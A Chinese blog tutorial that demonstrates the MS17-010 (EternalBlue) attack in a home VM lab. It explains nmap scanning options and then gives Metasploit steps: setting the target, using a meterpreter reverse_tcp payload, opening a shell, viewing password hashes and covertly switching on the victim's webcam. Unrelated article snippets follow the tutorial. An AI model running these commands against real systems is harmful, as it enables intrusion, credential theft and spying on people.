主机漏洞利用演示MS17-010(永恒之蓝)
ms17-010危害:对被攻击方的电脑造成蓝屏!
申明:本篇文章的用意仅做学习使用
网络搭建环境:
软件:Vmware Workstation 17
攻击机:Kali
靶机环境:Windows 7
Nmap软件的基本功能:
1、主机发现(Host Discovery)
2、端口扫描(Port Scanning)
3、版本侦测(Version Detection)
4、操作系统侦测(Operating System Detection)
Nmap优点:
1、灵活:支持数十种不同的扫描方式,支持多种目标对象的扫描。
2、强大:Nmap可以用于扫描互联网上大规模的计算机。
3、可移植:支持主流的操作系统:windows/Linux/Mac OS等
4、简单:提供默认的操作能覆盖大部分功能,基本端口扫描。
5、自由:Nmap是一款开源软件,在GPL License的范围内可以自由使用。
6、社区支持:Nmap是一款开源软件,背后有强大的社区团队支持。
Nmap常用的扫描命令
1、完整的全面扫描
命令为:nmap -T4 -A -v ip
-A 选项用于使用进攻性(Aggressive)方式扫描;
-T4 指定扫描过程使用的时序(Timing),总共有6个级别(0 - 5),级别越高,速度越快,但也容易被防火墙发现。
-v 表示显卡冗余(verbosity)信息,在扫描过程中显示扫描的细节,从而让用户了解当前的扫描状态。
2、扫描多台主机
命令为:nmap ***.***.***.1 ***.***.***.2 ***.***.***.3
3、扫描整个子网
命令为:nmap 192.168.64.*
Nmap常用扫描命令
-sT :TCP connect扫描
-sS :TCP SYN扫描
-sF/-sX/-sN :通过发送一些特殊的标志位以避开设备或软件的检测
-sP :通过发送ICMP echo请求探测主机是否存活,原理同ping
-sU :探测目标主机开放了哪些UDP端口
-sA :TCP ACK扫描,对防火墙上未屏蔽的端口进行探测
-sV :获取对呀端口上更为详细的服务版本信息
-Pn :在扫描之前,不发送ICMP echo请求测试目标是否存活
-o :启动对于TCP/IP协议栈的指纹特征扫描以获取远程主机的操作系统类型等信息
-F :快速扫描模式,只扫描在nmap-services中列出的端口
介绍完Nmap扫描工具后,下面来进行MS17-010的实验!
MS17-010漏洞攻击
漏洞描述:Microsoft Windows SMB Server远程代码执行漏洞
Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定的安全风险。
Microsoft Windows Server 2016 、Microsoft Windows Server 2012 R2、Microsoft Windows Server 2012、Microsoft Windows Server 2008 R2、Microsoft Windows Server 2008、Microsoft Windows RT 8.1等等
MS17-010漏洞攻击实验过程:
第1步:使用nmap -T4 -A -v -Pn 192.168.64.1/24 扫描Windows 7客户端的端口有哪些是开放的
可以看到这台电脑有很多端口是开放的,比如SMB的445端口
第2步:启用msf 渗透工具
第3步:搜索ms17-010(下面显示的)
第4步:选择use 3 的攻击模块(进行辅助扫描,确定漏洞是否存在)
第5步:使用show options命令查看设置(配置)
RHOSTS:这一项是填写目标(被攻击方)主机的IP地址
set rhosts 192.168.64.129 (确定目标(Windows 7的IP地址))
use 0 利用smb协议溢出漏洞的缺陷攻击Windows的操作系统(漏洞名称:ms17-010)
set rhosts 192.168.64.129 设置被攻击方的IP地址
set payload windows/x64/meterpreter/reverse_tcp 设置攻击载荷模块
getuid 查看当前的系统用户id权限
shell 进入被攻击方的DOS界面
exit 退出被攻击方的DOS界面
可以看到Windows 7的密码是以md5加密方式显示的
解密网站:https://www.cmd5.com
这里演示上传一张图片到Windows7系统
注意:我做实验的环境是在Vmware虚拟机,需要在虚拟机上设置允许获取物理机的摄像头权限
虚拟机右下方Chicony Integrated Camera的设备亮绿灯就表示虚拟机已经连接上物理机摄像头
开启摄像头
webcam_list 查看摄像头
webcam_snap 通过摄像头拍照
webcam_stream 通过摄像头开启视频
下面使用webcam_stream开启了摄像头的视频功能(摄像头的视频画面不便展示)
到这里MS17-010的实验就算结束了。
此实验只针对在Windows7系统上做MS17-010(永恒之蓝),在Windows 10操作系统上已经不存在MS17-010的漏洞了,如果要进行漏洞尝试,请尝试CVE-2020-0796(永恒之黑)。
相关文章:
主机漏洞利用演示MS17-010(永恒之蓝)
ms17-010危害:对被攻击方的电脑造成蓝屏! 申明:本篇文章的用意仅做学习使用 网络搭建环境: 软件:Vmware Workstation 17 攻击机:Kali 靶机环境:Windows 7 Nmap软件的基本功能: …...
2023年第六届河北省研究生数学建模竞赛题目B题Python求解代码
2023年第六届河北省研究生数学建模竞赛题目B题 本文文档与代码视频讲解与下载:【2023河北省研究生数学建模竞赛B题数据集和代码-哔哩哔哩】 https://b23.tv/weulGAO 光伏电池的异常检测与发电产能预测在碳达峰-碳中和的战略背景下,我国的光伏发电技术发…...
【三维点云处理】顶点、面片、邻接矩阵、邻接距离矩阵以及稀疏存储概念
文章目录 vts和faces基础知识vertices-节点(3是点的三维坐标)faces-面片(3是构成三角形面片的3个点) 邻接矩阵邻接距离矩阵(NN500)稀疏矩阵 vts和faces基础知识 vertices-节点(3是点的三维坐标…...
ansible 中的fetch模块的作用是什么
Ansible中的fetch模块用于从远程主机上复制文件到控制主机上。 fetch模块允许用户在远程主机上复制文件或目录,并将其下载到控制主机上的指定位置。它可以在执行Playbook期间执行此操作,也可以在Ad-Hoc命令中使用。 fetch模块的一些常见用途包括&#…...
Zabbix-6.4.4部署及监控配置
一、目标 对zabbix-6.4.4版本进行调研。了解并测试zabbix-6.4.4部署以及监控配置。 二、过程 前言:最新版本的zabbix-6.4.4的要求有所增加,配置要求如下: MySQL版本:8.0.X PHP版本:7.4.X libXML:2.6.1…...
解决 npm ERR! missing script: build 错误的方法
系列文章目录 文章目录 系列文章目录前言一、错误原因二、解决方法:三、注意事项:总结 前言 在使用 npm 进行前端项目构建时,有时会遇到错误信息 “npm ERR! missing script: build”,该错误通常发生在没有定义构建脚本时。本文将…...
json-server创建静态服务器2
上次写的 nodejs创建静态服务器 这次再来个v2.0 利用json-server很方便就可以实现。 vscode打开文件夹,文件夹所在终端: json-server.cmd --watch db.json 这里视频教程是没有上述命令标红的,但是会报错,具体不详,…...
开源视频监控管理平台国标GB28181视频EasyCVR电子地图功能展示优化
视频监控综合管理平台EasyCVR可提供的视频能力包括:视频监控直播、云端录像、云存储、录像检索与回看、告警上报、平台级联、云台控制、语音对讲、电子地图、H.265自动转码等,也具备接入AI智能分析的能力。 视频汇聚平台EasyCVR可拓展性强、视频能力灵活…...
端口复用与重映射
端口复用和重映射 STM32F1有很多的内置外设,这些外设的外部引脚都是与GPIO复用的。也就是说,一个GPIO如果可以复用为内置外设的功能引脚,那么当这个GPIO作为内置外设使用的时候,就叫做复用。 大家都知道,MCU都有串口…...
ros2 launch 集合 gazebo yolov8 rviz2
目录 1. ros2 yolov8 检测需要以来一些库,分别是:rclpy cv_bridge std_msgs sensor_msgs sensor_msgs_py vision_msgs 2. 创建一个新的功能包 3. 建立 yolo_launch.py 里面先加载gazebo和rviz2,在创建好本地的yolov8的node文件后也加入进来。 4. 创建好本地的yol…...
SD NAND【商业】
SD NAND【商业】 前言版权推荐SD NAND外观NAND与TF卡的区别雷龙CS SD NAND(贴片式TF卡)性能体验及应用 最后 前言 2023-7-23 16:20:19 因为本人对硬件了解不是很多,所以该篇参考自官方文档。 以下内容源自《【商业】》 仅供学习交流使用 版权 禁止其他平台发布…...
转换)
实现任意进制(2—32)转换
2020/01/01 实现原理参考代码测试样例其他补充后记交流 实现原理 本程序借助10进制数为中介数据,实现任意进制数之间的相互转换(2-36进制范围) 需要注意的是,数值范围不可超出 long long int 所表示的范围,即所输入需…...
Spring Boot 集成 Redis 三种模式实践汇总
背景 项目的某个模块集成了 SpringBoot Redis 包,客户端使用 Lettuce,Redis 测试环境单机模式。但是现场反馈的 Redis 环境是集群,如果简单的修改 spring.redis 配置为集群的配置信息,程序能否能无缝衔接呢? 本文记录…...
MySQL DQL语法
MySQL DQL语法 DQL语法简介 DQL(Data Query Language)语句是一种用于从数据库中检索数据的语言。它主要用于数据查询和数据分析,而不是对数据库中的数据进行更新、插入或删除。DQL语句通常用于获取特定条件下的数据,进行聚合计算…...
带头结点链表的反向输出)
算法之线性表1.1.1(7)带头结点链表的反向输出
设L为带头结点的单链表,编写算法实现从尾到头反向输出每个节点的值。 算法思想: 方法一:将链表压栈再输出,时间复杂度为O(n),空间复杂度为O(n) 方法二:用头插法重新建立单链表在输出,时间复杂度为O(n),空…...
)
设计模式三:抽象工厂模式(Abstract Factory Pattern)
抽象工厂模式(Abstract Factory Pattern)是一种创建型设计模式,它提供了一种方式来创建一系列相关或相互依赖的对象,而无需指定具体实现类。 在软件开发中,有时候需要根据不同的条件或环境来创建一组相关的对象。抽象工…...
Linux用户权限问题详解
Linux用户权限问题详解 【一】Linux权限的概念(1)用户类型(2)如何切换用户(3)用户相关的一些命令 【二】Linux文件权限管理(1)文件访问者的分类(2)文件类型和…...
flask中的session介绍
flask中的session介绍 在Flask中,session是一个用于存储特定用户会话数据的字典对象。它在不同请求之间保存数据。它通过在客户端设置一个签名的cookie,将所有的会话数据存储在客户端。以下是如何在Flask应用中使用session的基本步骤: 首先…...
记录联想拯救者R720重装系统
文章目录 bios里找不到U盘启动项2023.7.23重装系统后数据记录C盘内存修改默认AppData的路径(亲测,没用) bios里找不到U盘启动项 制作好启动盘后,开机按F2进入bios后,找不到U盘启动项,如下图所示࿱…...
Spring Alibaba Sentinel实现集群限流demo
1.背景 1.什么是单机限流? 小伙伴们或许遇到过下图这样的限流配置 又或者是这样的Nacos动态配置限流规则: 以上这些是什么限流?没错,就是单机限流,那么单机限流有什么弊端呢? 假设我们集群部署3台机器&a…...
告别Navicat!免费开源的DBeaver,手把手教你从下载到连接MySQL数据库
数据库管理新选择:DBeaver从入门到精通实战指南 在数据库管理领域,商业软件长期占据主导地位,但开源工具的崛起正在改变这一格局。作为一名长期与数据库打交道的开发者,我深知Navicat等商业工具虽然功能强大,但高昂的授…...
告别手动备份!用Power Automate Desktop自动备份桌面重要文件并生成日志
告别手动备份!用Power Automate Desktop打造智能文件备份系统 每天下班前,你是否会习惯性地将桌面上的重要文件拖拽到U盘或移动硬盘?这种重复性操作不仅耗时耗力,还容易因疏忽导致文件遗漏。更糟糕的是,当系统崩溃或误…...
EasyPhoto与ControlNet深度集成:实现精准肖像控制的终极指南
EasyPhoto与ControlNet深度集成:实现精准肖像控制的终极指南 【免费下载链接】sd-webui-EasyPhoto 📷 EasyPhoto | Your Smart AI Photo Generator. 项目地址: https://gitcode.com/gh_mirrors/sd/sd-webui-EasyPhoto 在AI肖像生成领域࿰…...
东莞市SEO优化对网站收录有何影响_东莞市SEO优化的常见问题有哪些
东莞市SEO优化对网站收录有何影响 在互联网时代,东莞市的企业和个人网站希望在搜索引擎上获得高排名,是非常重要的目标。搜索引擎优化(SEO)在这一过程中扮演了关键角色。东莞市SEO优化对网站收录有何影响呢?SEO优化不…...
你的ESP32项目还缺个BGM?手把手教你做个可切换歌单的迷你音乐播放器
为ESP32项目打造智能音乐模块:从蜂鸣器驱动到歌单管理系统 当你的智能家居设备在清晨用一段舒缓旋律唤醒你,或是机器人完成指令时播放一段俏皮的提示音,这种交互体验会瞬间提升产品的温度。ESP32作为一款功能强大的物联网芯片,完全…...
智能能耗管理系统如何助力轨道交通实现绿色低碳运营
1. 轨道交通能耗管理的痛点与转型机遇 每天早高峰的地铁站里,黑压压的人群挤满站台,列车一趟接一趟地运送乘客。很少有人注意到,这些看似平常的运营背后,隐藏着惊人的能源消耗。以某一线城市地铁系统为例,单条线路年用…...
【逆向实战】Unity3D+il2cpp手游反编译与逻辑修改全流程解析【IDA Pro+il2CppDumper】
1. 从零开始理解Unity3Dil2cpp逆向 第一次接触手游逆向的朋友可能会被"il2cpp"这个术语吓到。其实简单来说,il2cpp就是Unity3D用来提升游戏性能的编译方案——它把C#代码先转成C,再编译成原生机器码。这种架构虽然让游戏跑得更快,但…...
)
SegFormer实战:5分钟搞定ADE20K数据集上的语义分割(附完整代码)
SegFormer实战指南:ADE20K语义分割从零精解 在计算机视觉领域,语义分割技术正经历着前所未有的革新。ADE20K作为场景解析的标杆数据集,包含了150个精细标注的语义类别,成为检验算法实力的试金石。本文将带您深入SegFormer这一轻量…...
RTOS学习指南:从理论到实践的完整路径
1. RTOS入门路径解析:从理论到实践的完整指南作为一名嵌入式开发者,我经历过从裸机开发到RTOS应用的完整转型过程。记得第一次接触RTOS时,面对任务调度、信号量等新概念确实一头雾水。但通过系统学习和项目实践,我发现掌握RTOS并没…...
07_Neo4j知识体系之向量搜索与GraphRAG实战
07_Neo4j知识体系之向量搜索与GraphRAG实战 体系 AI 增强层:向量索引、相似度搜索、GraphRAG 架构、LLM 集成、知识图谱增强问答关联能力:与企业搜索、智能问答、多跳推理、知识组织、Agent 系统密切相关适用对象:AI 应用架构师、RAG 工程师、…...